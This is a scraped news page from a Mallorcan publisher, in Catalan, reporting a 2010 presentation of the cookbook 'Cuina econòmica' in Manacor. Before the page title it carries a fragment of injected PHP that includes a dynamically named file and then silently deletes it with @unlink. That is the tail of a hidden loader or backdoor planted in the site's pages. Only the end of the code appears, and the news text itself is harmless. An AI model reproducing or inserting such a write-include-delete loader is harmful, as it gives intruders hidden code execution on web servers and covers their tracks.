");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> Edicions Documenta Balear - Presentació de Cuina econòmica a Manacor
Cercador de Notícies
Calendari de notícies
09/02/2010 Documenta

Presentació de Cuina econòmica a Manacor

Dia 8 de febrer es va presentar a Ca Na Vallespina de Manacor CUINA ECONÒMICA Receptes fàcils per a temps difícils d’Antoni Tugores a cura d’Hilari de Cara i Bernat Nadal.
Va ser un gran èxit. El saló de Can Vallespir, ple a vessar amb gent dreta (més de cent cadires ocupades i gent dreta!) i s'ho van passar molt bé. No pogué venir Hilari de Cara, però en Bernat Nadal va fer un tast poètic, barrejant poetes, cuina i el llibre de Cuina econòmica. Llavors passarem al diàleg, dirigit per Bernat i la gent hi participà i es divertí. Al final de l'acte es va servir una espipellada a partir de receptes del llibre per a tots els presents on hi havia un variadíssim mostruari: panades, coques dolces, amargs, orellanes, raoles, croquetes, bunyolets de bacallà, tot fet nostre... Amb vins de Son Sureda Ric i Mistela feta a ca nostra de la collita de 2008.

Recomanar
Comentar
Comentaris (0)